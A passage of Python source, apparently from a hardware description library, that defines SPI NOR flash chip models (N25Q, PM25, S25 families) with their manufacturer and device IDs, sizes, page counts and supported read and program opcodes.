SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class N25Q256XX1E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xbb19
name = "n25q256..1e"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class N25Q256XX3E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xba19
name = "n25q256..3e"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class N25Q256A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xba19
name = "n25q256a"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class N25Q256AX1(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xbb19
name = "n25q256ax1"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class N25Q512A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xbb20
name = "n25q512a"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class N25Q512AX3(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0xba20
name = "n25q512ax3"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class PM25LD010(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x0021
name = "pm25ld010"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class PM25LD010C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x0021
name = "pm25ld010c"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class PM25LD020(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x0022
name = "pm25ld020"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class PM25LD020C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x0022
name = "pm25ld020c"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class PM25LD256C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x002f
name = "pm25ld256c"
total_size = 32768 # bytes
page_size = 256 # bytes
total_pages = 128
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class PM25LD512(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x0020
name = "pm25ld512"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class PM25LD512C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x0020
name = "pm25ld512c"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class PM25LQ016(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x0045
name = "pm25lq016"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class PM25LQ020(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x0042
name = "pm25lq020"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class PM25LQ032(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0046
name = "pm25lq032"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class PM25LQ032C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x0046
name = "pm25lq032c"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class PM25LQ040(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x0043
name = "pm25lq040"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class PM25LQ080(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x0044
name = "pm25lq080"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class PM25LV010(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "pm25lv010"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class PM25LV010A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x007c
name = "pm25lv010a"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class PM25LV016B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x0014
name = "pm25lv016b"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class PM25LV020(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x007d
name = "pm25lv020"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class PM25LV040(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x007e
name = "pm25lv040"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class PM25LV080B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x0013
name = "pm25lv080b"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class PM25LV512(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "pm25lv512"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class PM25LV512A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x007b
name = "pm25lv512a"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class S25FL004(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0212
name = "s25fl004"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class S25FL004A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0212
name = "s25fl004a"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class S25FL004K(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x4013
name = "s25fl004k"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class S25FL008(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0213
name = "s25fl008"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class S25FL008A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0213
name = "s25fl008a"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class S25FL008K(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x4014
name = "s25fl008k"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class S25FL016(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0214
name = "s25fl016"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class S25FL016A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0214
name = "s25fl016a"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class S25FL016K(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x4015
name = "s25fl016k"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class S25FL032(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0215
name = "s25fl032"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class S25FL032A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0215
name = "s25fl032a"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class S25FL032P(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0215
name = "s25fl032p"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class S25FL064(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0216
name = "s25fl064"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class S25FL064A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0216
name = "s25fl064a"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class S25FL064K(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.WINBOND
device_id = 0x4017
name = "s25fl064k"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class S25FL064L(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x6017
name = "s25fl064l"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
SpiNorFlashOpCodes.READ_1_1_2_4B,
SpiNorFlashOpCodes.READ_1_1_4_4B,
SpiNorFlashOpCodes.PP_1_1_4_4B,
]
dummy_bits = 8
class S25FL064P(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0216
name = "s25fl064p"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class S25FL116K(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x4015
name = "s25fl116k"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class S25FL128L(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x6018
name = "s25fl128l"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
SpiNorFlashOpCodes.READ_1_1_2_4B,
SpiNorFlashOpCodes.READ_1_1_4_4B,
SpiNorFlashOpCodes.PP_1_1_4_4B,
]
dummy_bits = 8
class S25FL128S(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x2018
name = "s25fl128s"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class S25FL128S0(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x2018
name = "s25fl128s0"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class S25FL128S1(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x2018
name = "s25fl128s1"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class S25FL129PXXXXXX1(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x2018
name = "s25fl129p......1"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class S25FL129P0(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x2018
name = "s25fl129p0"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class S25FL129P1(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x2018
name = "s25fl129p1"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class S25FL132K(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x4016
name = "s25fl132k"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class S25FL164K(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x4017
name = "s25fl164k"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class S25FL204K(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x4013
name = "s25fl204k"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
]
dummy_bits = 8
class S25FL208K(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x4014
name = "s25fl208k"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
]
dummy_bits = 8
class S25FL216K(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x4015
name = "s25fl216k"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class S25FL256L(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x6019
name = "s25fl256l"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
SpiNorFlashOpCodes.READ_1_1_2_4B,
SpiNorFlashOpCodes.READ_1_1_4_4B,
SpiNorFlashOpCodes.PP_1_1_4_4B,
]
dummy_bits = 8
class S25FL256S(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0219
name = "s25fl256s"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class S25FL256SXXXXXX0(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0219
name = "s25fl256s......0"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
]
dummy_bits = 8
class S25FL256S0(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0219
name = "s25fl256s0"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class S25FL256S1(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0219
name = "s25fl256s1"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class S25FL512S(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0220
name = "s25fl512s"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class S25FS512S(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0220
name = "s25fs512s"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class S25SL004A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0212
name = "s25sl004a"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class S25SL008A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0213
name = "s25sl008a"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class S25SL016A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SPANSION
device_id = 0x0214
name = "s25sl016a"
